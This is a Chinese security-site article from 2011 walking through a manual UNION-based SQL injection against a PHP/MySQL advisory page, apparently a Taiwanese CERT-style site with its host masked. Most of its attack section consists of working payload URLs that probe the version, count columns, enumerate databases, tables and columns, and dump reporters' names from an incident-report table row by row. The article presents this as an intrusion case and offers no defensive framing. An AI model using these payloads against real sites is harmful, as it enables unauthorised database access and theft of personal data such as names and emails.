首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
高级PHP手工注入
来源:vfocus.net 作者:vfocus 发布时间:2011-05-04  

1.判断版本http://www.xxxx.com/document/advisory/detail.php?id=7
and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询

2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
http://www.xxxx.com/document/advisory/detail.php?id=7
and 2=4 union select 1,2,3,4,5,6,7,8,9--

3.查看数据库版本及当前用户,http://www.xxxx.com/document/advisory/detail.php?id=7
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--

数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。

4.判断有没有写权限
http://www.xxxx.com/document/advisory/detail.php?id=7
and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限

没办法,手动猜表啦


5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from
information_schema.SCHEMATA limit
0,1
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
http://www.xxxx.com/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb

6.爆表,爆的是twcert库
http://www.xxxx.com/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5


7.爆列名,这次爆的是irsys表
http://www.xxxx.com/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status

8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
http://www.xxxx.com/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--

返回是3,说明每个列里有3个地段

9.爆字段内容
http://www.xxxx.com/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
爆出name列的第一个字段的内容

http://www.xxxx.com/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
爆出name列的第二个字段的内容



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·mysql可多语句执行下不用单引号o
·渗透校内网——XSS过程详解
·XSS漏洞基本攻击代码
·XSS偷取密码Cookies通用脚本
·XSS(跨站)偷cookie的代码
·Xss获取管理员后台地址实战
·xss跨站脚本攻击大全
·微软的“后门”:NTSD.exe,的远
·1433终极入侵之沙盒模式
·linux不提权跨目录访问的代码
·入侵 www.gongwuyuan.com.cn (
·Firefox攻击技巧总结
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved